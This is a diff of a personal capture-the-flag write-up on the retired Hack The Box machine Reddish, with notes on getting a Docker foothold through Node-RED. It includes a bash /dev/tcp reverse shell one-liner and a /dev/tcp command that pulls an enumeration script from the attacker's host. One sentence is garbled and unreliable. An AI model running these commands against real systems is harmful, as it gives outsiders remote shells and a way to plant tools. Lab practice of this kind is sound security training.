7RU7H/CTFs/HackTheBox/Retired-Machines/Reddish/Reddish-Helped-through.md

 ![shell](shell.png)

+## Docker Foothold

+First one and half is a half and then get two for the two is one reverse shell rule.
-`bash -c 'bash -i >& /dev/tcp/$IP/$PORT 0>&1'`
+1. `bash -c 'bash -i >& /dev/tcp/$IP/$PORT 0>&1'`

+[Reading 0xDF try various functionality of the NodeRed application](https://0xdf.gitlab.io/2019/01/26/htb-reddish.html#code-execution--shell-in-node-red), I decided that an additional beyond root would be to do the same and the highest goal being to try to create a proxy via the NodeRED.
+In the beyond root section I will outline a proxy and other stuff both 0xdf and atleast one idea if I do not complete a proxy.

-Even though I like ncat and netcat, I am glad to finally be prompted to use it as a file transfer mechanism instead of other tools.
+As a Day <4 note to self: even though I like ncat and netcat, I am glad to finally be prompted to use it as a file transfer mechanism instead of other tools.
 Similar to trying out powercat it felt fun, but also gratting a tad as I always see it on Enumeration Script scans after I run it.. but I don't check its there before file transfering.

+Checking whether I can run in memory on the box:
 ![](noexecshm.png)

+Ippsec's `cat` file transfer is OP.
 WOW on the cat file transfer, I have not seen this on any OSCP cheatsheets!
 ```bash
 bash -c "cat < /dev/tcp/$IP/$PORT > /tmp/LinEnum.sh"
 ```